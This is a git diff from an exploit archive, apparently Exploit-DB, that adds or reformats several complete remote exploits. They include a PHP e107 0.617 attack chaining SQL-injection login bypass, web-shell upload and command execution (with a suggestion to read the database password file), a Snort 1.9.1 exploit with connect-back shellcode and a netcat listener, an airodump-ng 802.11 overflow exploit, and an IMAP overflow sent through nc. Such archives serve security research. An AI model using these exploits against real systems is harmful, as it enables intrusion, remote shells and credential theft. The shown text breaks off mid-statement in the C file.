http://".$host.":".$port.$path."upload.php\r\n"; -$packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n"; -$packet.="Cookie2: \$Version=1\r\n"; -$packet.="Connection: Close, TE\r\n"; -$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; -$packet.="Content-Length: ".strlen($data)."\r\n"; -$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; -$packet.=$data; -show($packet); -sendpacket($packet); - -#STEP 3 -> Launch commands... -$packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n"; -$packet.="User-Agent: Website eXtractor\r\n"; -$packet.="Host: ".$host."\r\n"; -$packet.="Connection: Close\r\n\r\n"; -show($packet); -sendpacket($packet); -if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';} - else {echo 'Exploit failed...';} -} -else -{echo 'Fill in requested fields, optionally specify a proxy...';} - -?> - -# milw0rm.com [2005-10-18] +e107 0.617 remote commands execution

+e107 0.617 resetcore.php SQL injection & remote commands execution

+ a script byrgod at http://rgod.altervista.org

+

hostname (ex: www.sitename.com) +

path (ex: /e1 +07/ or just /)

+specify a port other than 80 (default value)

a shell command, cat ./../../e107_config. +php to see database username/password

send exploit through an HTTP proxy (ip:port) +

'; + +function show($headeri) +{ +$ii=0; +$ji=0; +$ki=0; +$ci=0; +echo ''; +while ($ii <= strlen($headeri)-1) +{ +$datai=dechex(ord($headeri[$ii])); +if ($ji==16) { + $ji=0; + $ci++; + echo ""; + for ($li=0; $li<=15; $li++) + { echo ""; + } + $ki=$ki+16; + echo ""; + } +if (strlen($datai)==1) {echo "";} else +{echo " ";} +$ii++; +$ji++; +} +for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) + { echo ""; + } + +for ($li=$ci*16; $li<=strlen($headeri); $li++) + { echo ""; + } +echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; +} + + +function sendpacket($packet) +{ +global $proxy, $host, $port, $html; +if ($proxy=='') + {$ock=fsockopen(gethostbyname($host),$port);} + else + { + $proxy=trim($proxy); + $parts=explode(':',$proxy); + echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; + $ock=fsockopen($parts[0],$parts[1]); + if (!$ock) { echo 'No response from proxy...'; + die; + } + } +fputs($ock,$packet); +if ($proxy=='') + { + + $html=''; + while (!feof($ock)) + { + $html.=fgets($ock); + } + } +else + { + $html=''; + while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) + { + $html.=fread($ock,1); + } + } +fclose($ock); +echo nl2br(htmlentities($html)); +} + + +if (($path<>'') and ($host<>'') and ($command<>'')) +{ + +$port=intval($port); +if (($port=='') or ($port<=0)) {$port=80;} +if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} +if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} +echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port); + +#STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings +$data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)." +&sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu +&siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a +&sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+ +is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+% +3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E. +&newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1 +&user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10& +smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S& +shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage= +English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1& +log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0& +forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie& +cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80& +im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php& +upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1& +displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1& +antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name="; +$data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e"; +// ^ ^ +// | | +// here we have login bypass ;) hash of [nothing] +//so, you see, we activate public uploads and .php extensions for attachments +$packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"; +$packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n"; +$packet.="Accept-Language: it\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n"; +$packet.="Host: ".$host.":".$port."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; +$packet.=$data; + +show($packet); +sendpacket($packet); +if (eregi("Core settings successfully updated",$html)) {echo '
Ok... we reset core values...Continue...';} + else {echo '
Exploit failed...'; die;} + +#STEP 2 -> Upload a shell... +$data='------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="file_name" + +baby +------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="file_version" + +666 +------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php" +Content-Type: multipart/form-data + + +------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="file_userfile[]"; filename="" + + +------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="file_description" + +mphhh.... +------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="file_website" + + +------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="file_demo" + + +------------W1dUnnWzZExD8Rb1Pctwsq +Content-Disposition: form-data; name="upload" + +Submit and Upload +------------W1dUnnWzZExD8Rb1Pctwsq--'; + +$packet="POST ".$p."upload.php HTTP/1.1\r\n"; +$packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n"; +$packet.="Host: ".$host.":".$port."\r\n"; +$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; +$packet.="Accept-Language: it,en;q=0.9\r\n"; +$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; +$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; +$packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n"; +$packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n"; +$packet.="Cookie2: \$Version=1\r\n"; +$packet.="Connection: Close, TE\r\n"; +$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; +$packet.=$data; +show($packet); +sendpacket($packet); + +#STEP 3 -> Launch commands... +$packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n"; +$packet.="User-Agent: Website eXtractor\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Connection: Close\r\n\r\n"; +show($packet); +sendpacket($packet); +if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';} + else {echo 'Exploit failed...';} +} +else +{echo 'Fill in requested fields, optionally specify a proxy...';} + +?> + +# milw0rm.com [2005-10-18] diff --git a/platforms/linux/remote/139.c b/platforms/linux/remote/139.c index 3108e6cb7..89388ef06 100755 --- a/platforms/linux/remote/139.c +++ b/platforms/linux/remote/139.c @@ -556,6 +556,6 @@ int GetNextAddr(int Addr) } return(Addr); -} - -// milw0rm.com [2003-12-27] +} + +// milw0rm.com [2003-12-27] diff --git a/platforms/linux/remote/18.sh b/platforms/linux/remote/18.sh index d2405ccb4..61c536326 100755 --- a/platforms/linux/remote/18.sh +++ b/platforms/linux/remote/18.sh @@ -1,143 +1,143 @@ -#!/bin/sh - -########################################################## -# p7snort191.sh by truff (truff@projet7.org) # -# Snort 1.9.1 and below remote exploit # -# # -# Tested on Slackware 8.0 with Snort 1.9.1 from sources # -# # -# Usage: # -# 1/ Launch a listening netcat to listen for the shell # -# nc -p 45295 -l # -# # -# 2/ p7snort119.sh yourIP [Ret_Addr] # -# # -# Where yourIP is the IP where the netcat is listening # -# and Ret_Addr is the address (8 hexa digits) of the # -# shellcode (eg: 0819fec2) # -# # -# # -# This vulnerability was discovered by Bruce Leidl, # -# Juan Pablo Martinez Kuhn, and Alejandro David Weil # -# from Core Security Technologies during Bugweek 2003. # -# # -# Greetz to #root people and projet7 members. # -# Special thx to mycroft for helping me with shell # -# scripting stuff. # -# # -# www.projet7.org - Security Researchs - # -########################################################## - - -# Put here the path to your hping2 binary -HPING2=/usr/sbin/hping2 - -# You should change these params to make the snort sensor -# capture the packets. -IPSRC=192.168.22.1 -IPDST=192.168.22.2 -PTSRC=3339 -PTDST=111 - - - -echo "p7snort191.sh by truff (truff@projet7.org)" - -case $# in -0) -echo "Bad number of params" -echo "Read comments in sources" -exit -1 -;; -1) -RET=0819fec2 -echo "Using default retaddr (Slackware 8.0)" -echo $RET -;; -2) -RET=$2 -echo "Using custom retaddr" -echo $RET -;; -*) -echo "Bad number of params" -echo "Read comments in sources" -exit -1 -;; -esac - - - -# Nops -i=0 -while [ "$i" -lt "512" ]; do -i=$(expr "$i" + 1) -echo -n -e "\x90" >> egg -done - - -# linux x86 shellcode by eSDee of Netric (www.netric.org) -# 131 byte - connect back shellcode (port=0xb0ef) -echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg -echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg -echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg -echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg -echo -n -e "\x68" >> egg - -# IP here -echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \ -$(echo $1 | cut -d. -f2) \ -$(echo $1 | cut -d. -f3) \ -$(echo $1 | cut -d. -f4)) >> egg - -echo -n -e "\x66\x68\xb0" >> egg -echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg -echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg -echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg -echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg -echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg -echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg -echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg -echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg -echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg -echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg -echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg -echo -n -e "\x01\xcd\x80" >> egg - -# 3 dummy bytes for alignment purposes -echo -n -e "\x41\x41\x41" >> egg - -i=0 -cpt=$(expr 3840 - 134 - 512) -cpt=$(expr $cpt / 4) - - -var1=0x$(echo $RET | cut -b7,8) -var2=0x$(echo $RET | cut -b5,6) -var3=0x$(echo $RET | cut -b3,4) -var4=0x$(echo $RET | cut -b1,2) - -while [ "$i" -lt "$cpt" ]; do -i=$(expr "$i" + 1) -echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg -done - - -# hping ruleZ -$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ --d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \ -1>/dev/null 2>/dev/null - -$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ --d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \ -1>/dev/null 2>/dev/null - -$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \ --d 0 --setseq 0xc0c4c014 --setack 0xffffffff \ -1>/dev/null 2>/dev/null - -rm egg - -echo "Exploit Sended" - -# milw0rm.com [2003-04-23] +#!/bin/sh + +########################################################## +# p7snort191.sh by truff (truff@projet7.org) # +# Snort 1.9.1 and below remote exploit # +# # +# Tested on Slackware 8.0 with Snort 1.9.1 from sources # +# # +# Usage: # +# 1/ Launch a listening netcat to listen for the shell # +# nc -p 45295 -l # +# # +# 2/ p7snort119.sh yourIP [Ret_Addr] # +# # +# Where yourIP is the IP where the netcat is listening # +# and Ret_Addr is the address (8 hexa digits) of the # +# shellcode (eg: 0819fec2) # +# # +# # +# This vulnerability was discovered by Bruce Leidl, # +# Juan Pablo Martinez Kuhn, and Alejandro David Weil # +# from Core Security Technologies during Bugweek 2003. # +# # +# Greetz to #root people and projet7 members. # +# Special thx to mycroft for helping me with shell # +# scripting stuff. # +# # +# www.projet7.org - Security Researchs - # +########################################################## + + +# Put here the path to your hping2 binary +HPING2=/usr/sbin/hping2 + +# You should change these params to make the snort sensor +# capture the packets. +IPSRC=192.168.22.1 +IPDST=192.168.22.2 +PTSRC=3339 +PTDST=111 + + + +echo "p7snort191.sh by truff (truff@projet7.org)" + +case $# in +0) +echo "Bad number of params" +echo "Read comments in sources" +exit -1 +;; +1) +RET=0819fec2 +echo "Using default retaddr (Slackware 8.0)" +echo $RET +;; +2) +RET=$2 +echo "Using custom retaddr" +echo $RET +;; +*) +echo "Bad number of params" +echo "Read comments in sources" +exit -1 +;; +esac + + + +# Nops +i=0 +while [ "$i" -lt "512" ]; do +i=$(expr "$i" + 1) +echo -n -e "\x90" >> egg +done + + +# linux x86 shellcode by eSDee of Netric (www.netric.org) +# 131 byte - connect back shellcode (port=0xb0ef) +echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg +echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg +echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg +echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg +echo -n -e "\x68" >> egg + +# IP here +echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \ +$(echo $1 | cut -d. -f2) \ +$(echo $1 | cut -d. -f3) \ +$(echo $1 | cut -d. -f4)) >> egg + +echo -n -e "\x66\x68\xb0" >> egg +echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg +echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg +echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg +echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg +echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg +echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg +echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg +echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg +echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg +echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg +echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg +echo -n -e "\x01\xcd\x80" >> egg + +# 3 dummy bytes for alignment purposes +echo -n -e "\x41\x41\x41" >> egg + +i=0 +cpt=$(expr 3840 - 134 - 512) +cpt=$(expr $cpt / 4) + + +var1=0x$(echo $RET | cut -b7,8) +var2=0x$(echo $RET | cut -b5,6) +var3=0x$(echo $RET | cut -b3,4) +var4=0x$(echo $RET | cut -b1,2) + +while [ "$i" -lt "$cpt" ]; do +i=$(expr "$i" + 1) +echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg +done + + +# hping ruleZ +$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ +-d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \ +1>/dev/null 2>/dev/null + +$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \ +-d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \ +1>/dev/null 2>/dev/null + +$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \ +-d 0 --setseq 0xc0c4c014 --setack 0xffffffff \ +1>/dev/null 2>/dev/null + +rm egg + +echo "Exploit Sended" + +# milw0rm.com [2003-04-23] diff --git a/platforms/linux/remote/253.pl b/platforms/linux/remote/253.pl index e48301916..b8d9af0a2 100755 --- a/platforms/linux/remote/253.pl +++ b/platforms/linux/remote/253.pl @@ -38,6 +38,6 @@ for ($i += length($shellcode); $i < $len; $i += 4) { $exploit_string = "* AUTHENTICATE {$len}\015\012$buffer\012"; system("(echo -e \"$exploit_string\" ; cat) | nc $target 143"); - - -# milw0rm.com [2001-01-19] + + +# milw0rm.com [2001-01-19] diff --git a/platforms/linux/remote/284.c b/platforms/linux/remote/284.c index 56f5649b6..97b475616 100755 --- a/platforms/linux/remote/284.c +++ b/platforms/linux/remote/284.c @@ -236,6 +236,6 @@ int main(int argc, char **argv) { close(sock); return 0; -} - -// milw0rm.com [2001-03-03] +} + +// milw0rm.com [2001-03-03] diff --git a/platforms/linux/remote/29734.txt b/platforms/linux/remote/29734.txt index da5c0fd88..2d8cf8e45 100755 --- a/platforms/linux/remote/29734.txt +++ b/platforms/linux/remote/29734.txt @@ -91,6 +91,6 @@ Ruben Garrote Garc rubengarrote [at] gmail [dot] com http://boken00.blogspot.com -EDB Note: -It seems 3.70 version has been patched against this. -Later versions are probably vulnerable to this. \ No newline at end of file +## EDB Note: +# It seems 3.70 version currently available for download +# has been patched against this. Earlier versions are probably vulnerable to this. \ No newline at end of file diff --git a/platforms/linux/remote/30018.py b/platforms/linux/remote/30018.py new file mode 100755 index 000000000..f8d0ecf4d --- /dev/null +++ b/platforms/linux/remote/30018.py @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/23887/info + +Python applications that use the 'PyLocale_strxfrm' function are prone to an information leak. + +Exploiting this issue allows remote attackers to read portions of memory. + +Python 2.4.4-2 and 2.5 are confirmed vulnerable. + +#!/usr/bin/python + +import locale + +print locale.setlocale(locale.LC_COLLATE, 'pl_PL.UTF8') +print repr(locale.strxfrm('a')) diff --git a/platforms/linux/remote/30043.txt b/platforms/linux/remote/30043.txt new file mode 100755 index 000000000..01f919d98 --- /dev/null +++ b/platforms/linux/remote/30043.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24004/info + +Sun JDK is prone to a multiple vulnerabilities. + +An attacker can exploit these issues to crash the affected application, effectively denying service. The attacker may also be able to execute arbitrary code, which may facilitate a compromise of the underlying system. + +Sun JDK 1.5.0_07-b03 is vulnerable to these issues; other versions may also be affected. + +http://www.exploit-db.com/sploits/30043.zip \ No newline at end of file diff --git a/platforms/linux/remote/30074.txt b/platforms/linux/remote/30074.txt new file mode 100755 index 000000000..a6ca2481c --- /dev/null +++ b/platforms/linux/remote/30074.txt @@ -0,0 +1,70 @@ +source: http://www.securityfocus.com/bid/24111/info + +PEAR is prone to a vulnerability that lets attackers overwrite arbitrary files. + +An attacker-supplied package may supply directory-traversal strings through the 'install-as' attribute to create and overwrite files in arbitrary locations. + +This issue affects PEAR 1.0 to 1.5.3. + +create a file named "INSTALL" and save it in the current directory. +Save the following XML as package.xml, and run "pear install package.xml" + +If php_dir is /usr/local/lib/php The file "INSTALL" will be installed into +/usr/local/test.php + + + + + + Test_Sec + pear.php.net + Test security vulnerability + demonstrate install-as vulnerability + + + Greg Beaver + cellog + cellog@php.net + yes + + 2007-03-05 + + 1.6.0 + 1.6.0 + + + stable + stable + + PHP License + + allow up to latest beta version [tias] + + + + + + + + + + 4.3.0 + + + 1.4.3 + + + + + + + + + + diff --git a/platforms/linux/remote/30089.txt b/platforms/linux/remote/30089.txt new file mode 100755 index 000000000..bca8a30df --- /dev/null +++ b/platforms/linux/remote/30089.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24161/info + +Ruby on Rails is prone to a script-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Attacker-supplied script code would run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +This issue affects Ruby on Rails 1.2.3; other versions may also be affected. + +http://www.exploit-db.com/sploits/30089.tgz \ No newline at end of file diff --git a/platforms/linux/remote/3724.c b/platforms/linux/remote/3724.c index b742b9389..340db59d3 100755 --- a/platforms/linux/remote/3724.c +++ b/platforms/linux/remote/3724.c @@ -1,186 +1,186 @@ -/** - * airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit - * - * Proof of concept exploit for a stack (and heap) based - * overflow in airodump-ng. The vulnerability can be exploited - * by transmitting some specially crafted 802.11 packets to - * execute arbitrary code on any machines within range - * that are sniffing with a vulnerable version of airodump-ng. - * - * This exploit requires the lorcon 802.11 packet injection - * library, see http://802.11ninja.net for details. - * - * Compiling: - * - * gcc -o airodump-remote airodump-remote.c -lorcon - * - * Usage: - * - * ./airodump-ng [return addr] - * - * Drivers supported by lorcon: - * - * wlan-ng, hostap, airjack, prism54, madwifing, madwifiold, - * rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw - * - * Header types: - * - * 0 - None (not tested) - * 1 - Fake prism54 header - * 2 - Fake radiotap header (not tested) - * - * Return addresses: - * - * Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934 - * Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934 - * - * Example usage: - * - * ./airodump-ng wlan0 prism54 11 1 0x8054934 - * - * Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt - * Author: Jonathan So [ jonny [ @ ] nop-art.net ] - * - * Copyright (C) 2007 Jonathan So - */ - -#include -#include -#include - -// Linux x86 sys_write shellcode. Any arbitrary shellcode should work -// here, it doesn't matter if it contains nulls. Maximum 792 bytes. - -char shellcode[] = "\xeb\x14" // jmp get_message - - // start: - "\x59\x31\xdb\x31\xd2\xb2" - "\x1b" // message length - "\x31\xc0\x88\x04\x11" - "\xb0\x04\xcd\x80" // sys_write - "\xb0\x01\xcd\x80" // sys_exit - - // get_message: - "\xe8\xe7\xff\xff\xff" // call start - "Stop sniffing our network!!"; // message text - -int main(int argc, char **argv) -{ - tx80211_t tx; - tx80211_packet_t txp; - uint8_t packet[1044]; - uint8_t *ppacket; - - int headertype; - unsigned ret_addr = 0x8054934; - FILE *fp; - - if(argc<5) { - printf("usage: %s -[ret_addr]\n", argv[0]); - exit(1); - } - - if(argc>5) { - ret_addr = strtoul(argv[5], NULL, 16); - } - - headertype = atoi(argv[4]); - - if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) != -TX80211_ENOERR) { - fprintf(stderr, "Error initializing driver"); - return 1; - } - - if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) != -TX80211_ENOERR) { - fprintf(stderr, "Error setting inject mode\n"); - return 1; - } - - if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) { - fprintf(stderr, "Error setting channel\n"); - } - - if (tx80211_open(&tx) < 0) { - fprintf(stderr, "Unable to open interface\n"); - return 1; - } - - txp.packet = packet; - - // Fill packet with nops - memset(packet, 0x90, sizeof(packet)); - - switch (headertype) { - case 0: - // No arptype, just send raw packet - ppacket = packet; - break; - case 1: - // Send fake prism header - memcpy(packet+4, "\x08\x00\x00\x00", 4); - ppacket = packet + 8; - break; - case 2: - // Send fake radiotap header - packet[0] = 0; - packet[2] = 3; - ppacket = packet + 3; - break; - default: - printf("Invalid header type. Valid options are:\n"); - printf(" 0 - none\n"); - printf(" 1 - prism54\n"); - printf(" 2 - radiotap\n"); - return 1; - } - - // set some necessary 802.11 header fields - ppacket[0] = 0xB0; - ppacket[1] = 0; - ppacket[24] = 1; - ppacket[25] = 0; - ppacket[26] = 2; - ppacket[27] = 0; - - txp.plen = 512 + (ppacket - packet); - if (tx80211_txpacket(&tx, &txp) < txp.plen) { - fprintf(stderr, "Error sending packet 1\n"); - return 1; - } - - ppacket[26] = 4; - - if (tx80211_txpacket(&tx, &txp) < txp.plen) { - fprintf(stderr, "Error sending packet 2\n"); - return 1; - } - - // Insert shellcode at end of nopsled - memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode)); - - // Overwrite some char*, needs to be a valid address - memcpy(ppacket+1028, &ret_addr, 4); - - // Overwrite global variable sk_len, used as argument to memcpy - memcpy(ppacket+1032, "\x20\x05\x00\x00", 4); - - // Return address - memcpy(ppacket+820, &ret_addr, 4); - - ppacket[1] = 0x40; - txp.plen = 1036 + + (ppacket - packet); - - if (tx80211_txpacket(&tx, &txp) < txp.plen) { - fprintf(stderr, "Error sending packet 3\n"); - return 1; - } - - tx80211_close(&tx); - - return 0; -} - -// milw0rm.com [2007-04-12] +/** + * airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit + * + * Proof of concept exploit for a stack (and heap) based + * overflow in airodump-ng. The vulnerability can be exploited + * by transmitting some specially crafted 802.11 packets to + * execute arbitrary code on any machines within range + * that are sniffing with a vulnerable version of airodump-ng. + * + * This exploit requires the lorcon 802.11 packet injection + * library, see http://802.11ninja.net for details. + * + * Compiling: + * + * gcc -o airodump-remote airodump-remote.c -lorcon + * + * Usage: + * + * ./airodump-ng [return addr] + * + * Drivers supported by lorcon: + * + * wlan-ng, hostap, airjack, prism54, madwifing, madwifiold, + * rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw + * + * Header types: + * + * 0 - None (not tested) + * 1 - Fake prism54 header + * 2 - Fake radiotap header (not tested) + * + * Return addresses: + * + * Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934 + * Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934 + * + * Example usage: + * + * ./airodump-ng wlan0 prism54 11 1 0x8054934 + * + * Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt + * Author: Jonathan So [ jonny [ @ ] nop-art.net ] + * + * Copyright (C) 2007 Jonathan So + */ + +#include +#include +#include + +// Linux x86 sys_write shellcode. Any arbitrary shellcode should work +// here, it doesn't matter if it contains nulls. Maximum 792 bytes. + +char shellcode[] = "\xeb\x14" // jmp get_message + + // start: + "\x59\x31\xdb\x31\xd2\xb2" + "\x1b" // message length + "\x31\xc0\x88\x04\x11" + "\xb0\x04\xcd\x80" // sys_write + "\xb0\x01\xcd\x80" // sys_exit + + // get_message: + "\xe8\xe7\xff\xff\xff" // call start + "Stop sniffing our network!!"; // message text + +int main(int argc, char **argv) +{ + tx80211_t tx; + tx80211_packet_t txp; + uint8_t packet[1044]; + uint8_t *ppacket; + + int headertype; + unsigned ret_addr = 0x8054934; + FILE *fp; + + if(argc<5) { + printf("usage: %s +[ret_addr]\n", argv[0]); + exit(1); + } + + if(argc>5) { + ret_addr = strtoul(argv[5], NULL, 16); + } + + headertype = atoi(argv[4]); + + if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) != +TX80211_ENOERR) { + fprintf(stderr, "Error initializing driver"); + return 1; + } + + if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) != +TX80211_ENOERR) { + fprintf(stderr, "Error setting inject mode\n"); + return 1; + } + + if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) { + fprintf(stderr, "Error setting channel\n"); + } + + if (tx80211_open(&tx) < 0) { + fprintf(stderr, "Unable to open interface\n"); + return 1; + } + + txp.packet = packet; + + // Fill packet with nops + memset(packet, 0x90, sizeof(packet)); + + switch (headertype) { + case 0: + // No arptype, just send raw packet + ppacket = packet; + break; + case 1: + // Send fake prism header + memcpy(packet+4, "\x08\x00\x00\x00", 4); + ppacket = packet + 8; + break; + case 2: + // Send fake radiotap header + packet[0] = 0; + packet[2] = 3; + ppacket = packet + 3; + break; + default: + printf("Invalid header type. Valid options are:\n"); + printf(" 0 - none\n"); + printf(" 1 - prism54\n"); + printf(" 2 - radiotap\n"); + return 1; + } + + // set some necessary 802.11 header fields + ppacket[0] = 0xB0; + ppacket[1] = 0; + ppacket[24] = 1; + ppacket[25] 